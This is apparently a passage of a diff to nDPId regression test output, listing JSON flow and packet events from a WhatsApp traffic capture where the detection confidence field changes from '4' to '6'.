+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655067574156,"flow_last_seen":1655067574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655067574223,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655059510580,"flow_last_seen":1655059510757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655067574418,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068071917,"flow_last_seen":1655068071917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068071917,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1655068071917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068071917,"pkt":"eJS0JASgYDjgxTWgCABFAAA8f0dAAD8GgvrAqAJkszzDMcu4FGbUWpFrAAAAAKAC\/\/9c\/wAAAgQFtAQCCApIKiN2AAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1655068071949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068071949,"pkt":"eJS0JASgYDjgxTWgCABFAAA0f0hAAD8GgwHAqAJkszzDMcu4FGbUWpFsCrZXEIAQAVd+jAAAAQEICkgqI5aouQE5"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1655068072089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068072089,"pkt":"eJS0JASgYDjgxTWgCABFAAA4f0lAAD8GgvzAqAJkszzDMcu4FGbUWpFsCrZXEIAYAVc4rwAAAQEICkgqJCKouQE5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068071917,"flow_last_seen":1655068072120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068072120,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655060495977,"flow_last_seen":1655060496256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1655068072357,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068071917,"flow_last_seen":1655068072120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068072120,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655060495977,"flow_last_seen":1655060496256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1655068072357,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":329,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":26960,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":41,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":41,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":269,"global_ts_msec":1655068204945} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068204945,"flow_last_seen":1655068204945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068204945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1655068204945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068204945,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eR1AAD8GiTTAqAJkszzDIaLAFGY48OrHAAAAAKAC\/\/8oAgAAAgQFtAQCCAoF9wW8AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1655068204976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068204976,"pkt":"eJS0JASgYDjgxTWgCABFAAA0eR5AAD8GiTvAqAJkszzDIaLAFGY48OrIWCi8FIAQAKyAowAAAQEICgX3Bdt\/K0Hp"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1655068204977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068204977,"pkt":"eJS0JASgYDjgxTWgCABFAAA4eR9AAD8GiTbAqAJkszzDIaLAFGY48OrIWCi8FIAYAKw7UQAAAQEICgX3Bdx\/K0HpRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068204945,"flow_last_seen":1655068204978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655068204978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068204945,"flow_last_seen":1655068204978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655068204978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655068672605,"flow_last_seen":1655068672605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655068672605,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1655068672605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655068672605,"pkt":"eJS0JASgYDjgxTWgCABFAAA8f7NAAD8Ggo7AqAJkszzDMcxGFGbT7kd7AAAAAKAC\/\/98VAAAAgQFtAQCCApIM03mAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1655068672638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655068672638,"pkt":"eJS0JASgYDjgxTWgCABFAAA0f7RAAD8GgpXAqAJkszzDMcxGFGbT7kd8DNw8XIAQAVenVgAAAQEICkgzTgfXLOHd"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1655068672650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655068672650,"pkt":"eJS0JASgYDjgxTWgCABFAAA4f7VAAD8GgpDAqAJkszzDMcxGFGbT7kd8DNw8XIAYAVdh+QAAAQEICkgzThPXLOHdRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068672605,"flow_last_seen":1655068672682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068672682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655068672605,"flow_last_seen":1655068672682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655068672682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":345,"packets-processed":344,"total-skipped-flows":0,"total-l4-payload-len":28550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":43,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":43,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":280,"global_ts_msec":1655069476999} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655069476999,"flow_last_seen":1655069476999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655069476999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1655069476999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655069476999,"pkt":"eJS0JASgYDjgxTWgCABFAAA8v0dAAD8GQwrAqAJkszzDIaL6FGZl3G3iAAAAAKAC\/\/\/JXwAAAgQFtAQCCAoF+bQbAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1655069477033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655069477033,"pkt":"eJS0JASgYDjgxTWgCABFAAA0v0hAAD8GQxHAqAJkszzDIaL6FGZl3G3jvQquJIAQAKzBYgAAAQEICgX5tE0ysJf9"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1655069477034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655069477034,"pkt":"eJS0JASgYDjgxTWgCABFAAA4v0lAAD8GQwzAqAJkszzDIaL6FGZl3G3jvQquJIAYAKx8DgAAAQEICgX5tFAysJf9RUQAAQ=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655069476999,"flow_last_seen":1655069477066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1655069477066,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061873005,"flow_last_seen":1655061873914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061657436,"flow_last_seen":1655061657966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655069476999,"flow_last_seen":1655069477066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1655069477066,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061873005,"flow_last_seen":1655061873914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655061657436,"flow_last_seen":1655061657966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655069477452,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":352,"total-skipped-flows":0,"total-l4-payload-len":29867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":44,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":44,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":288,"global_ts_msec":1655071168997} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071168997,"flow_last_seen":1655071168997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071168997,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1655071168997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071168997,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/oFAAD8GA8DAqAJkszzDMbxqFGaCVc7FAAAAAKAC\/\/8bsQAAAgQFtAQCCApxNV+xAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1655071169028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071169028,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/oJAAD8GA8fAqAJkszzDMbxqFGaCVc7GXkxmWYAQAIBN7gAAAQEICnE1X+Ud8hk1"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1655071169033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071169033,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/oNAAD8GA8LAqAJkszzDMbxqFGaCVc7GXkxmWYAYAIAImAAAAQEICnE1X+od8hk1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071168997,"flow_last_seen":1655071169064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655071169064,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655063661893,"flow_last_seen":1655063662083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655062569330,"flow_last_seen":1655062569674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071168997,"flow_last_seen":1655071169064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655071169064,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655063661893,"flow_last_seen":1655063662083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655062569330,"flow_last_seen":1655062569674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 